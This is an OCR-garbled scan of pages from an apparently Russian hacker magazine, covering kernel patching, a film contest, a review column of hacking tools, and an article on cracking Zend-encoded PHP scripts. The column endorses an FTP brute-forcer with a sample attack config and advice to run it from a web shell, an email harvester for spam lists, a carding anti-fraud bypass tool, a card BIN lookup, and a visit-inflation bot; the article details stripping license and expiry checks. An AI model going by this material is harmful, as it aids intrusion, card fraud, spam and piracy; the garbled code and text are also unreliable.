ЗоШСЕ по команде «тар32» показывает «піозкгпі» (без расшире- 
ния), а не «пІозкгпН», как этого следовало ожидать с точки зрения 
здравого смысла, тем более что в этом піозкгпі присутствуют хакну- 
тые нами байты 87И С9Н. А вот РЕ-ТООІ-3 с плагином Ехігете Оитрег 
«честно» сообщает полное имя файла ядра вместе с путем . 

Кому из них верить? Вопрос далеко не риторический! Если мы хотим 
сравнить образ ядра с его файлом на диске (для обнаружения 
оп-Ііпе раісб’а, например), нам необходимо точно знать, к чему обра- 
щаться, иначе можно совсем не в тот лес забрести. 

Ответ дает команда «тоб» того же ЗоШСЕ, показывающая имя моду- 
ля ядра (піозкепі.ехе) и соответствующий ему файл (піозкгпН.ехе). 
Весь фокус в том, что имена модулей не обязаны соответствовать 
именам файлов. И это относится не только к ядру, но и ко всем дина- 
мическим библиотекам вообще! При первой загрузке статической 
компоновкой или АРІ-функцией І_оасИ_іЬгагу система находит файл 



на диск 
поі/Акі] 
писа 



1 Внедряясь в ядро, мы вторгаемся в святую 
I святых операционной системы, и потому 
необходимо заблаговременно подготовить 

себя к возможным сбоям и падениям. Если 
диск размечен под РАТ, то всегда есть 
возможность загрузиться о о^емнои 
дискеты и вернуть все файлы с ДистрпбУ™ 
ного СЭ-ВОМ. Правда, если до этого были 
установлены какие-то пакеты обновлении, то 
Гсвятыня» превращается в ад. Даже ^тоталь- 
ная^ Переустановка не помогает: ѴѴюбоѵѵз 
Называется ставиться поверхболее све- 
жей версии. К счастью, пакет обновлении 
обычно представляет собой обыкновенна 
саЬ-файл с приклеенным к нему ехе^инс- 
таллятором, поэтому необходимые файлы 

можно извлечь без установки! 

СЫТЕВ все значительно хуже, и что 

либо подключить винчестер с упавшей сис- 

темойккомпьютерамсживойЫТ.устшчовив 

его вторым (впрочем, современные ВЮЬ 
позволяют грузиться с любого жесткого дис- 
ка) Как вариант, можно приобрести ѴѴшсІоѵѵв 
РЕ_ своеобразный иѵеСО, загружающийся 
с СО-ВОМ и не требующий установки . 
Естественно, прежде чем вносить какие 
бы то ни было изменения в файлы и/или 
реестр, необходимо создать резервную 
копию Файлы копируются РАВ'ом а рѳеслр 
-либо штатной утилитой МюгозоП Васкир, 
либо путем загрузки с другого жесткого 
диска/иѵѳСО. ос 
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онкурс 

Объявляем новый конкурс: ты можешь выиграть 1 
из 50 приглашений на специальный показ фильма 
"Хоттабыч", организованный специально для чи- 
тателей Хакера. Показ пройдет в киноцентре "Ок- 
тябрь" на Новом Арбате 1 1 августа. 

Чтобы принять участие в этой тусовке, тебе нужно 
ответить на 1 0 вопросов. Подсказки ищи на сайте 
ѵѵѵѵѵѵ. ИоиаЬѵсИ . пеі и в трейлере к фильму, кото- 
рый лежит на нашем ОѴО. 

Вопросы: 

1 . Сколько миллионов наколдовал Хоттабыч Г ене? 

2. Что происходило, когда Хоттабыч фотографировал? 

3. Какую птицу сфотографировал Хоттабыч? 

4. На чем Г ена и Хоттабыч летали по Москве? 

5. Музыка какой группы звучит в фильме? 

6. Как зовут девушку, в которую влюбился Гена? 

7. Кому принадлежит фраза: «640КБ оперативной памяти 
должно быть достаточно для каждого"? 

8. «В будущем компьютеры будут весить не более чем 1.5 
тонн» - где это мнение было опубликовано и в каком году? 

9. Кто сказал: «Думаю, что на мировом рынке мы найдем спрос 
для пяти компьютеров»? 

10. Что грозит хакеру, который сможет (если сможет, конеч- 
но) взломать сайт Місгозоіі? Ж 

Ответы присылай на ЬоІ1аЬѵсЬ@геаІ.хакер.ги 
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СТРОЙКОВ ЛЕОНИД АКА ВОЮ 

/НОШ@ВК.Н1 ц 



В ЭТОМ МЕСЯЦЕ ФОРБ НАШЕЛ НОВОГО ЧЕЛОВЕКА, КОТОРЫЙ ТЕПЕРЬ БУДЕТ 
ДЕЛАТЬ ДЛЯ ТЕБЯ СУМАСШЕДШУЮ ПОДБОРКУ ЭКСКЛЮЗИВНЫХ ПРОГРАММ 
ДЛЯ ВЗЛОМА, КОТОРЫХ НЕ НАЙТИ ПРОСТО ТАК В СЕТИ. НАСЛАЖДАЙСЯ. ВСЕ 
ПРОГРАММЫ ЛЕЖАТ НА НАШЕМ ДИСКЕ. 



ГТРВгиІе ѵО.1 

ОС: ѴѴіпсІоѵѵз 2000/ХР, 
□пих/РгееВЗО. 

Автор: кісІ_госк (ЬОІсІ-ир-Іеат) 




Ты, наверное, видел множество различных 
Іір-брутфорсеров. Но большинство из них 
крайне неудобны. Одни умеют перебирать па 
роли лишь под конкретный логин, другие же 
настолько медленно работают, что хочется 
удушиться проводом от клавы. Поэтому пред 
ставляю тебе новый мультипоточный фтп-брут 
форсер от ЬОІсІ-ирЧеат. РТРВгиІе на данный 
момент умеет вести перебор по указанным 
логинам в ІодіпІізШІ и паролям из раззІізШІ 
Брутер является мулыипоточным, причем ко 
личество потоков указывается в конфиге сопі 
там же прописывается жертва. Результат ата 
ки бережно сохраняется в лог вида *.разз, где 
* — номер нитки (потока), подобравшей пароль 
Вот пример конфига для РТРВгиІе: 

іагдеі.сот 

300 

Где «ІагдеГсот» — атакуемый хост, а «300» — 
количество соединений для брута. Несомнен 
ным плюсом служит тот факт, что *піх-версия 
брутфорсера не требует компиляции и руто 
вых прав. Ты можешь залить ГТРВгиІе на свой 
веб-шелл, запустить и уйти спать, после чего 
просто заглянуть в лог. Кроме того, советую 
не жадничать и не ставить сразу 800 потоков 
так как это создаст сильную нагрузку на сер 
вер, и он просто упадет вместе с переборщи 
ком. Рекомендуемое число — 300, а дальше 
уже смотри сам: все зависит от производи 
тельности сервера и пропускной способности 
твоего канала. 

Софтина существует в двух версиях: под ѵѵіп 
и под *піх. Скачать прогу или оставить заме 
чание можно на официальном сайте Гі0ІсІ-ир 
Іеат ( ЬПр://И0ІсІ-ир-іеат.пе1.пЛ 
Удачного брута! 



Пи24-ЫПС Тооіз 0.93 

ОС: ѴѴіпсІоѵѵз 2000/ХР. 

Автор: ЗЬасЮЗ (РУ-24 Зесигііу Теат) 




Чѵпо-сканео 



Как сказано на сайте ВІІ-24 Зесигііу Теат, 
Ви24-І\ІВ(3 Тооіз 0.93 — прямое продолже- 
ние Ви24-І\ІЯ(3 Тооіз 0.91 Ьу Оокк21, но с 
новыми возможностями и на совершенно 
новом движке. Протестировав тулзу, я ос- 
тался доволен. Во-первых, все запросы для 
сканера хранятся в файле зсап_ба1:аЬазе. 
сІЬ, что позволяет добавлять свои и редак- 
тировать имеющиеся. А во-вторых, сканер 
является мультипоточным. Все, что от тебя 
требуется, — это указать тестируемый хост, 
после чего ты получишь полноценный отчет. 
Для примера я решил просканировать по- 
тенциально бажный сайт (е.д.: ѵѵѵѵѵѵ.іагаеі. 
ш), уязвимости которого были мне прекрас- 
но известны. Интересовало одно: сумеет 
ли сканер найти их. Через несколько минут 
после запуска я получил вот такой лог: 

Приступаю к сканированию адреса [ѵѵѵѵѵѵ.іагдеі.ги] ... 
Найдено: ИіірУ/ѵѵѵѵѵѵТагдеТги/./асІтіп/ 

Найдено: ИіірУ/ѵѵѵѵѵѵЛагдеТги/асІтіп/ 

Найдено: Иіір://\л/\л/\л/.іагдеі.ги/и/ 

Найдено: ИіірУ/ѵѵѵѵѵѵТагдеТгиДогит/ 

Найдено: Иіір://\л/\л/\л/.іагдеі.ги/дие5іЬоок/ 

Найдено: ИіірУ/ѵѵѵѵѵѵТагдеТги/і/ 

Найдено: Иіір://\л/\л/\л/.іагдеі.ги/іпзіаІІ/ 

Найдено: Иіір://ѵѵ\л/\л/.іагдеі.ги/пе\л/8/ 

Найдено: ИіірУ/ѵѵѵѵѵѵТагдеТги/рІпогит/соттоп.рИр 
Найдено: ІШр://\л/\л/\л/.іагдеі.ги/рІіогит/ 

Найдено: ИіірУ/ѵѵѵѵѵѵ.іагдеТги/рІпогит/ѵіеѵѵіоріс.рІір 
Найдено: ИПр://ѵѵѵѵѵѵЛагдеі. ги/рЬогит/ѵіеѵѵіоріс. 

рНр?іЦ=зоте_зНШ_ісІ=2 
Найдено: ИіірУ/ѵѵѵѵѵѵТагдеТги/рІірВВ/ 

Найдено: ИІрУ/ѵѵѵѵѵѵ.Іагдеі.ги/зіІез/ 

Найдено: ИіірУ/ѵѵѵѵѵѵ.іагдеІги/рІпрВВ/ѵіеѵѵіоріс. 

рЬр?іоріс_ісІ= 

Найдено: Ьир://ѵѵ\л/\л/.1:агдеІги/рІірВВ2/зеагсІп. 

рГір?зеагсГі_ісІ= 1\ 

Сканирование завершено. 



Как видно, сканер нашел не только доступные 
для чтения веб-директории, но и определил на- 
личие на сайте бажной версии форума рбрВВ, 
подтвердив тем самым свою боеспособность. 
Также из возможностей Ри24-ЫР(3 Тооіз 0.93 
стоит отметить: НТТР Неаб сканер уязви- 
мостей и стандартные примочки типа Ріпдег, 
Тгасегоиіег, ѴѴІтоіз-клиент, ОІ\ІЗ-І_оокир. 

В общем, тизі Ьаѵе! 

МаіІ СгаЬег ѵі.0 

ОС: ѴѴіпсІоѵѵз 2000/ХР. 

Автор: СоЬаІІ (ОРЗ Теат) 




Универсальный граббер 

Как-то я слил кусок базы с одного забугорно- 
го сервера и озадачился вопросом парсин- 
га всех мыльников. Сделать это вручную не 
представлялось возможным. И я уже поду- 
мывал над написанием специализированного 
скрипта, когда мне посоветовали программу 
МаіІ СгаЬег. Как написано на сайте ОРЗ Теат: 
«Маленькая программка на С++ для "выдира- 
ния" мыльников из текстовых файлов. Просто 
незаменима для создания своего спамлиста». 
Программа запускается из консоли, но это ни- 
чуть не уменьшает ее возможности. Необходи- 
мо лишь прописать путь к текстовому файлу, 
содержащему е-таіі адреса, и указать файл 
вывода для готового спамлиста, подождать 
пару секунд и довольствоваться продуктом 
для продажи местным спамерам. 

ГгееСар ѵ3.18 

ОС: ѴѴіпсІоѵѵз 95/98/М Е/ІЧТ/2000/ХР. 

Наверняка ты слышал о такой программе, 
как ЗоскзСЬаіп. Сейчас я хочу представить 
тебе ее прямого конкурента — РгееСар. 
Данная тулза служит для перенаправления 
твоего трафика через удаленный сокс-сер- 
вер, причем есть поддержка зоскз ѵ4, зоскз 
ѵ5 и НТТР-Ргоху. Как сказано на сайте: «Че- 
рез РгееСар можно пробросить только ТСР 
или ІЮР. Причем протокол ІЮР — только 
через ЗОСКЗѵ5, только через одну проксю 
и только в режиме «прямой видимости», то 
есть без І\ІАТ посередине. Все остальное 
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(істр, ідтр и т.д.) пробросить нельзя, в силу 
ограничений, накладываемых стандартом 
ПРО». Но главное, что софтина полностью 
бесплатная и распространяется по лицен- 
зии ОШ (ЗРІ_. Я сам ежедневно использую 
РгееСар и полностью доволен прогой. Из до- 
стоинств программы можно выделить: 

• Функциональность программы ЗОСКЗСар! 

• Функциональность программы ЗОСКЗСйаіп! 

• Поддержка ЗОСКЗ-протоколов ѵ4 и ѵ5 (РРС 

1928) . 

• Поддержка авторизации для ЗОСКЗ ѵ5(ВРС 

1929) . 

• Поддержка цепочек ЗОСКЗ-серверов (так 
называемый ЗОСКЗ Сйаіп). 

• Поддержка туннелирования через НТТР- 
прокси (ѵіа СОІМІМЕСТ теФоб)(РРС 2817). При- 
чем можно использовать в каскаде ЗОСКЗ- 
серверов. 

• Запуск вместе с системой. 

• Работоспособность на ѴѴіпсІоѵѵз 95/98/МЕ/ 
ІМТ/2000/ХР. 

• Поддержка большинства популярных прило- 
жений, таких как М$ Іпіегпеі Ехріогег, Ыеізсаре, 
МогіІІа, ТгіІІіап, Орега, М$ ОиІІоок Ехргезз. 

• Попсовый скиновый ХР'шный интерфейс. 

• Бесплатность! 

Так что настоятельно рекомендую тебе ис- 
пользовать РгееСар. 

Кагсіа Іооіз ѵі.0 

ОС: ѴѴіпсІоѵѵз 2000/ХР. 

Автор: @дРЗ$$0Р 




Срепство пля обхопа антифропа 

Описывая Кагсіа Іооіз, я даже не буду спра- 
шивать тебя, чем ты занимаешься в сети и ка- 
ким образом зарабатываешь себе на жизнь. 
Каждый сам отвечает за свои действия. Ведь 
не зря говорят: «Если Бог есть, то мы попа- 



ли». Увы, но эта программа не защитит тебя 
от Божьей кары. А вот помочь обойти анти- 
фрод на зарубежном шопе ей вполне под 
силу. Итак, перейдем к основным возмож- 
ностям тулзы: 

1. Возможность подмены идентификации ОС 
(ѴѴіпсІоѵѵз, І_іпих, РгееВЗЭ, ОрепВЗЭ, ІМеіВЗЭ, 
ОеЬіап, Мас_РоѵѵегРС, ЗипОЗ). 

2. Возможность подмены идентификации 
браузера (ѴѴіпсІоѵѵз: МЗІЕ, МогіІІа, Орега, 
ІМеІзсаре, Сгагу Вгоѵѵзег. ІІпіх/Ыпих-ЬазесІ: 
ЕЫпкз, Копциегог, 1_іпкз, ІМеІзсаре, МогіІІа, 
Орега). 

3. Подмена языковых пакетов. 

4. Смена временной зоны (достаточно боль- 
шой выбор городов и временных зон — Цент- 
ральная Америка, Тихоокеанское время США 
и Канады, Аляска и т.д.). 

5. Очистка куков. 

6 . Прокси-чекер. 

7. Идентификатор типов кредитных карт (Ѵіза/ 
МазІегСапДОізсоѵег/АМЕХ) 

8 . База данных БИНов банков (удобный поиск, 
определение банка по бину). 

К сожалению, основные возможности Кагсіа 
Іооіз проявляются в совокупности с ІЕ. Кроме 
того, программа платная, триальная версия 
работает всего 10 дней. Но мир не без добрых 
людей, так что пользуйся полной версией по- 
лезной софтины. 

СС2Вапк ѵІ.З 

ОС: ѴѴіпсІоѵѵз 98/ІЧТ/МЕ/2000/ХР. 

Автор: Ва2е 




Удобная и нужная в хозяйстве тулза. Поможет 
получить дополнительную информацию о бан- 
ке, сделавшем кредитную карточку. Для этого 
нужно перейти на закладку «Віпз». Вводим 
номер кредитной карточки в поле «СС пит», 
нажимаем «Зеагсй» и получаем название бан- 
ка (Вапк ІМате), где была сделана кредитная 
карточка, его телефон (Вапк Рйопе) и АВА 
Воиііпд ІМитЬег. Данная версия имеет базы 
данных для кредитных карточек Ѵіза, АтЕх и 
МазІегСагб. 

Возможности этой версии : 

1. Поиск информации о банке по бину/номеру 
кредитной карточки; 



2. Поиск дополнительной информации о бан- 
ке по АВА Воиііпд ІМитЬег (ЫЗА); 

3. Поиск вечно занятых телефонов по штату 
(ЫЗА); 

4. Поиск информации о 2ір'е (ЫЗА); 

5. Поиск штата по ЗЗІМ (ЫЗА). 

Не знаю, с какой целью ты будешь использо- 
вать прогу, но учти, что твои действия могут 
оказаться противозаконными. Хотя, надо ска- 
зать, что эта тулза является одной из лучших в 
своем роде. Этому свидетельствует и удобный 
интерфейс, и возможности программы, и ее 
бесплатность! Так что вперед гип поѵѵ! 



Ториз ѵі.1 

ОС: 95/98/М Е/ЫТ/2000/ХР. 
Автор: Ва2е 




Накручиваем посещаемость 



Если у тебя есть свой сайт в сети, то это 
программа будет для тебя буквально неза- 
менима. 

Раскручивая ѵѵеЬ-проекты, кто-то предпочи- 
тает работать с дорвеями, продвигая сайт 
в поисковиках, кто-то просто покупает тра- 
фик. Но в некоторых случаях удобно исполь- 
зовать бота, который мог бы накручивать 
статистику посещений, поднимая сайт в раз- 
личных топах. Так вот Ториз — это средство 
накрутки баннеров, счетчиков и страниц 
целиком. По сути, это обычный браузер, ко- 
торый может отправлять запрос на обновле- 
ние страницы определенное количество раз 
с определенным интервалом времени. При 
этом Ториз осуществляет каждый запрос 
через новый прокси-сервер, имитируя та- 
ким образом уникального посетителя. База 
прокси находится в файле ргоху.ізі и требует 
постоянного обновления - проктики быстро 
дохнут. Лучше всего, конечно, юзать покуп- 
ные сервера, поскольку в паблик источниках 
нормальной базы не найти. 

Интервал между загрузками рекомендую 
тебе ставить из расчета пропускной спо- 
собности канала и качества прокси-листа и 
количества записей в нем. В идеале запус- 
кать Ториз лучше на ѵѵіп-дедиках с широким 
каналом и анлимитным трафиком, чтоыб не 
испытывать никаких проблем. 

Я думаю, ты по достоинству оценишь рабо- 
тоспособность тулзы и серьезно продви- 
нешь все свои крутые Х-проекты на первые 
позиции во всех реатингах :). зс 
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под хакерским прицелом 



Исследование и взлом закодированных скриптов 

ПРОБЛЕМА ЗАЩИТЫ ИНТЕЛЛЕКТУАЛКОЙ СОБСТВЕННОСТИ НЕ НОВА, И 
ОСОБЕННО ОСТРО ОНА СТОИТ В МІ^ѴНР. СОЗДАТЕЛИ РНР ДЛЯ ЗАЩИТЫ 
КОДА ПРЕДЛАГАЮТ ПРОДУКТ 2ЕЫЭ ОСТАРЮ. ПО ИХ СЛОВАМ, ОН ЗАЩИЩАЕТ 
ИСХОДНИКИ, ПРЕОБРАЗУЯ ИХ В НЕКИЙ ПРОМЕЖУТОЧНЫЙ БИНАРНЫЙ ВИД. 

НО НАСКОЛЬКО ЭТОТ ВИД УСТОЙЧИВ К ВНЕШНИМ ВОЗДЕЙСТВИЯМ? в этой 
СТАТЬЕ Я РАССКАЖУ, КАК С ЛЕГКОСТЬЮ СНЯТЬ ТРИАЛЬНЫЕ И ЛИЦЕНЗИОННЫЕ 
ОГРАНИЧЕНИЯ С ЛЮБОГО ЗАЩИЩЕННОГО СКРИПТА, А ТАКЖЕ КАК ПОЛУЧИТЬ 
ЕГО ИСХОДНЫЙ КОД. 



ВСЕ МАНИПУЛЯЦИИ БУДУТ РАССМАТРИВАТЬСЯ ДЛЯ РНР 5.1 .4 И 2ЕЫЭ ОРТІМІ2ЕР 
3.0.0. СУЩЕСТВУЕТ НЕСКОЛЬКО АЛЬТЕРНАТИВ СТОРОННИХ РАЗРАБОТЧИКОВ: 
ЗОІІВСЕ ѲЦАРЮІАІЧ, ЮМСІІВЕ, РНРСІРНЕН (ИХ ТЫ МОЖЕШЬ НАЙТИ НА НАШЕМ 
ЭѴО). ПОРОЖДЕНИЯ ВОСПАЛЕННОГО МОЗГА ТИПА ЗОІІВСЕСОР ИЛИ ССЮЕЬОСК 
ЗА ЗАЩИТУ МОЖНО НЕ СЧИТАТЬ. 



Кодовая защита 

Каждый кодированный протектором файл 
начинается с одной из сигнатур: 

1. <?рЬр@2епсІ; 

2. 2епсІ 

В первом случае имеется некий заголовок, 
который будет показан в том случае, если не 
установлен 2епсІ Оріітігег. Во втором же слу- 
чае все бинарное мясо вывалится в браузер. 
Важно знать, что все строки в закодирован- 
ном сценарии за что-то отвечают. Первая 
строка — это сигнатура. Вторая — это файло- 
вое смещение относительно начала файла в 
восьмеричной системе счисления. 

Далее следуют четыре строковых параметра: 

1 . Это номер формата или номер 2епсІ АРІ — кому 
как нравится. Руководствуясь этим номером, 
Оріітігег будет парсить файл, поэтому, если 



етдкгигап 
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Типичный копированный скрипт 



ты правишь запакованный скрипт, всегда 
возвращай оригинальный номер. 

2 . Версия интерпретатора, для которого пред- 



назначен кодированный файл. Для РНР4 — 1 , 
РНР5 — 2. Если установлен РНР4, а файл — для 
пятерки, то оптимизатор выдаст ошибку. 

3. Длина запакованных данных (тех данных, 
что идут сразу после последнего, четвертого, 
параметра). 

4 . Длина распакованных данных. 

Теперь нам необходимо распаковать ос- 
тавшиеся данные. Создатели 2е пб не стали 
придумывать свои алгоритмы, а воспользо- 
вались сІеТІаІе со словарем. Данный алгоритм 
реализован в библиотеке 2 ІіЬ ( ѵѵѵѵѵѵ.гІіЬ.пеі У Этой 
библиотекой, недолго думая, и воспользовались 
в 2епсІ. Покопавшись в примерах из 2ІіЬ, можно 
быстро написать себе программу для распаков- 
ки. Словарь надо взять из самого оптимайзера. 
Например, для версии РНР5. 1.x онлежит на 
смещении 0х000503Э0 и имеет длину 3296 байт. 
Также необходимо написать запаковщик. Прин- 
цип, алгоритм и словарь точно такие же. 
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Распаковываем любой нами же запакованный 
скрипт — и «брюки превращаются» во что- 
нибудь подобное: 



Пример распакованного скрипта 

Что сразу бросается в глаза? Это имена 
используемых функций, переменных, классов, 
методов класса, строк. Какую же выгоду ты 
можешь извлечь из этого? Во-первых, есть спи- 
сок используемых функций. Во-вторых, в коде 
отчетливо видны некоторые строки, которые ты 
можешь легко изменить, не забывая при этом 
исправить длину, которая указана перед началом 
строки. Это можно сотворить с элементами ди- 
зайна, встроенными в скрипт, или примитивными 
защитами наподобие: 



№ ($_ЗЕВѴЕВ["НТТР_НОЗТ"] != "тузирегзііе.ги") ехіі; 

Рассмотрим реальный пример: продук т ѵѵѵѵѵѵ. 
ехсеірагзег.сот — парсер ЕхсеІ, который отказы- 
вается работать через 1 5 дней. В нем есть файл 
Іісепзе.рИр. Распаковав его, сразу бросаются в 
глаза названия типаехрігаІіоп_сІа1е и ригсІтазе_ 
баіе, атакже даты, которые можно подправить. 
Правим на 2030-й год, запаковываем — и скрипт 
больше нас не беспокоит по поводу окончания 
даты использования. 

Впрочем, очень часто в платных скриптах есть 
«стучалка» на сайт разработчика, и скрипт может 
содержать бэкдор, поэтому надо быть осторож- 
ным. Далее мы рассмотрим, что представляет 
собой лицензирование, и за что 2епб просит 
такие дикие деньги. 

Лицензирование в 2епсІ 

Закодируем простейший скрипт: 

<?рПр 

зеі_ііте_1ітіі(0); 
ргіпй("3сгір1 зІагіѴі"); 

$а = 5; 

$Ь — $а + 6: 
есІпо$Ь; 

?> 

Распакуем и получим: 





■ іхау^ііи виіГЕШінпг «мм 
яхтшіміія іи ивв пак хііІІІ 
лвснііы тіішніі іівднч: 

ЙІЙИНІЮ 4ІІ»ЧВиНН1 

Заголовок распакованного скрипта 



Для начала поясню два принципа десериали- 
зации: 

1 . Для строк: сначала идет длина, которая 
является числом. Полученное число является 
длиной идущей далее строки (это хорошо 
видно в самом начале скрипта, так как первым 
параметром является строка). 

2. Для чисел: сначала идет длина строки, а по- 
том само число, которое записано как строка. 
Для примера: 02 31 00. Длина — 2, Строка — 31 
00. Само число — единица. 

Первым параметром является имя владельца 
кодировщика, который кодировал скрипт. В 
нашем случае кодировщик зарегистрирован на 
«2епб Епсобегігіаі». Второй параметр — всегда 
единица. Если он отличен от единицы, то загруз- 
чик прекращает выполнение. Далее следует 
параметр, обозначающий, какую версию коди- 
ровщика мы использовали: зарегистрирован- 
ную или нет. В нашем случае — единица, то есть 
незарегистрированная. Четвертый — всегда 
единица (назначение его я так и не понял). 
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Казалось бы, все просто, но 
2епб вставляет палки в колеса, 
добавляя в последний 2епб Оиагб 
обфускатор. Относительно его 
могу сказать, что он портит имена функций, 
классов, методов, но оставляет нетрону- 
тыми имена переменных внутри функций и 
классов. Использовать его надо осторожно: 
на тестовых примерах часть скриптов просто 
отказалась работать. 



Пятый параметр отвечает за тип лицензии: 

0 — Не требует лицензии (І\Іо Ысепзе 
Зирроб) 

1 — Требует лицензию (Педиіге Ѵаііб Ысепзе) 

2 — Поддерживает лицензию (Зиррогі 
Ысепзе). 

Процитирую документацию: «ТЫз аііоѵѵз уои 
Іо депегаіе епсобесі Іііез сап орегаіе 
ѵѵіФіп а Іітііеб зсоре, зисИ аз а Іітііеб ІгіаІ 
ѵегзіоп Ига! гедиігез а ѵаііб Іісепзе іп огбег 
Іо Ье ІиІІу Іипсііопаі». А именно: функция 
2 епб_Іоабег_ПІе_Іісепзеб(), с помощью кото- 
рой мы можем ограничить полную функцио- 
нальность скрипта при отсутствии лицензии. 
Шестой параметр отвечает за ограничение 
по времени на запуск скрипта. Если текущая 
дата выше указанной, то получим ошибку 
«РаіаІ еггог: ТЫз Не баз ехрігесі». Дата отоб- 
ражена в ипіх Іітезіатр (количество секунд, 
прошедших с 1 970-го года). 

Если параметр равен нулю, то ограничения 
по времени нет. Рассмотрим пример: 
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Здесь мы видим число 1 1 597 1 4573, что соот- 
ветствует 01 .10.2006. Значит, данный скрипт 
перестанет работать после этой даты. Но 
ничего страшного. Меняем число на 0 (то есть 
записываем 30 00), правим длину 0В на 02 — и 
данное ограничение больше нас не беспокоит. 
Следующий параметр очень важен. Это — конт- 
рольная сумма. По ней проверяются лицензи- 
онные данные и регистрационное имя (первый 
параметр). По ней также генерируется табли- 
ца, по которой мы получаем реальный номер 
опкодов РНР, поэтому с этим параметром надо 
вести себя осторожно. 

Восьмой параметр (визуально неприметен): 
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В кодировщике есть параметр ѴѴогк опіу ѵѵіІИ 
оібег епсобесі Іііез. Думаю, название говорит 
само за себя. Варианты: 00 и 01 , то есть 
«нет» и «да». 

И, наконец, последний параметр — «сіитту. 
аббг». Он не всегда такой, бывает странная 
строка, что-нибудь типа: «-ТибзЬЗТ$)». 
Смысл здесь не совсем ясен. Загрузчик 
при его чтении выделяет, читает и сразу же 
освобождает память (скорее всего, что- 
нибудь для обратной совместимости). Уфф. 
С параметрами мы разобрались. Теперь 
самое время приступить к разбору наших 
имен, регистраций и лицензий. 

Первый тип лицензии — это «І\Іо Ысепзе 
Зиррогі» . В нем участвуют всего две сущ- 
ности: имя (первый параметр) и контрольная 
сумма: 
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По ней мы определяем имя владельца кодиров- 
щика. По этому имени генерируется контроль- 
ная сумма. Функция, используемая для этого, 
называется абІег32. Приведем листинг ниже: 

ипзідпеб іпі асІІег32_ТіазТі(сІпаг *баІа, іпі Іеп) { 
ипзідпеб іпі И = 0, і2 = 0; 

Ьг(іпіі=0;і<1еп;і++) { 

И +=баІа[і]; 

І2 += И; 

} 

И %= 65521; 

І2 %= 65521 ; 

І2 <<= 16; 
геіигп І2 1 И; 



Вызвав функцию абІег32_НазІт («2епб 
Епсобег ІгіаІ » , 1 8), мы на выходе получим чис- 
ло: 1036256941 . Если мы в скрипте изменим 
имя, то при вычислениях оптимайзер получит 
другую контрольную сумму и сравнит с той, 
что указана в скрипте. Если они не равны, 
то он прекратит выполнение. А если мы 
изменим вместе с именем и контрольную 
сумму, то будет сгенерирована неправиль- 
ная таблица преобразования опкодов — и 
оптимайзер упадет. 

Второй тип лицензии — это «Редиіге Ѵаііб 
Ысепзе» . Закодируем наш скрипт с этой 
опцией. Попробуем запустить и получим: 
«ѴѴагпіпд: Ысепзе сЫеск Таііеб ! » . Выполнение 
на этом прерывается. Распакуем и увидим 
что-нибудь типа: 




Заголовок скрипта, тоебѵюшего лицензию 

Сколько сразу интересного добавилось! Для 
начала разберем тип лицензии (обозначено 
желтой полоской). Он равен единице, то есть 
это — «Ведиіге Ѵаііб Іісепзе». Далее следует 
блок данных, относящийся к этой лицензии. 
Опять мы видим имя владельца кодировщика 
(назовем его гедпате). Далее следует назва- 
ние продукта (обозначено зеленой линией, 
назовем его ргобисіпате), которое мы 
указываем в параметре -Іісепзе-ргобисі ко- 
дировщика. Потом идет первый блок данных, 
длиной 548 байт (назовем этот блок баіаі ), 
после него расположен второй блок данных, 
длиной 808 байт (назовем этот блок ба!а2, 
заканчивается он красной вертикальной 
полоской). И далее, как всегда, идет пара- 
метр ограничения по времени и контрольная 
сумма. В данном случае контрольная сумма 
вычисляется таким образом: 

іпі: сИескИазЬ = аб1ег32_ИазИ(гедпате) л абІег32_ 



базіп(ргобисіпате) л абіег32_ІпазІп(баІа1 ) л 
абІег32_базІп(баіа2); 



То есть в данном случае имеет место операция 
ХОР над всеми контрольными суммами. 
Изменим параметр лицензии с «1 » на «0» и 
вырежем все блоки (гедпате, ргобисіпате, 
баіаі , ба!а2). Однако, запаковав данный 
скрипт, мы все равно не сможем его запустить, 
так как контрольная сумма от «2епб Епсобег 
ІгіаІ» равна 1036256941 , ау нас — 457376076. 
Менять контрольную сумму мы не в силах, зато 
запросто можем поменять имя. То есть задача 
сводится к тому, чтобы подобрать набор байт. 
Обсуждение и решение этой проблемы есть 
на форуме сгаскІ@Ь: Ыір://сгаскІаЬ.гиЛ/іпбех. 
рНр?ас1іоп=ѵФгеаб&іогит=1&1оріс=2927 . 
Найдя необходимые байты и подставив это в 
скрипт, получим: 
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Вырезание требования лицензии 



Пакуем, пробуем запускать, и видим: 



Зсгірі зіаіі 
11 



О, чудо! Скрипт запустился! Как видишь, 
вырезка требования лицензии — задача три- 
виальная и очень легко поддается автомати- 
зации. 

И, наконец, третий тип лицензии — это 
«Зиррогі Ысепзе». Он служит для ограниче- 
ния возможностей скрипта при отсутствии 
лицензии. 

Тут совсем все легко. Для примера напишем 
скрипт: 

<?рПр 

ЗІІсіНо = 2 епб_ІоабегЫіІе_Іісепзеб(); 
і{ ($ІісіпТо === РАІ_5Е) { 
есбо "йето Ѵегзіоп"; 

} еізе { 

есбо "РиІІ Ѵегзіоп, Іісепзе баіа:"; 
ргіп1:_г($ІісіпТо); 

} 

?> 



Закодируем с «Зиррог* Ысепзе», запустим 
и, естественно, получим «Эето Ѵегзіоп». 
Распакуем. Сразу бросается в глаза, что конт- 
рольная суммау нас зависиттолько от имени, 
то есть абІег32_ИазІт(«2епб Епсобег ігіаі», 18) = 
1036256941. 

Поэтому весь лицензионный «мусор» мы мо- 
жем смело вырезать. А имя функции изменим 
на 2 епб_Іоабег_ІіІе_Іісеп" 2 "еб. 

Пакуем под названием зсгірі.рНр и пишем 
небольшой сценарий: 

<? 

Ыпсііоп 2 епб_ІоабеіЩіІе_Іісеп" 2 "еб() { 
геШгп аггауС'РгобисЫЧате" => "МуРгобисГ); 

// ну и остальные лицензионные параметры не 
//забываем вернуть 

// подробнее, какие параметры должна возвращать 
// 2 епб_Іоабег_ 1 іІе_Іісепзеб(), можно посмотреть в 
//документации 
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} 

іпсІисІеС'зсгірІрГір"); 

?> 

Запускаем его и видим: 

РиІІ Ѵегзіоп, Іісепзе сІаІаАггау 
( 

[Ргосіисі-Мате] => МуРгосІисі 
) 

Эю, конечно, варварский метод, ведь для каж- 
дого скрипта придется писать соответствую- 
щий над ним скрипт и при разных уровнях опти- 
мизации придется править несколько мест. Но 
это первое, что пришло мне в голову :). 

Хочу отметить, почему нельзя было менять 
контрольную сумму. Дело в том, что номеров 
опкодов РНР в скрипте явно нет, но есть сме- 
щения, по которым мы получим оригинальные 
опкоды. Примерно так: 

сЬаг орсосіе = 1аЫе[ойзе1] — (орсосіепит & 7) 

В скрипте есть только оТТзеІ: и , естественно, 
порядковый номер опкода относительно нача- 
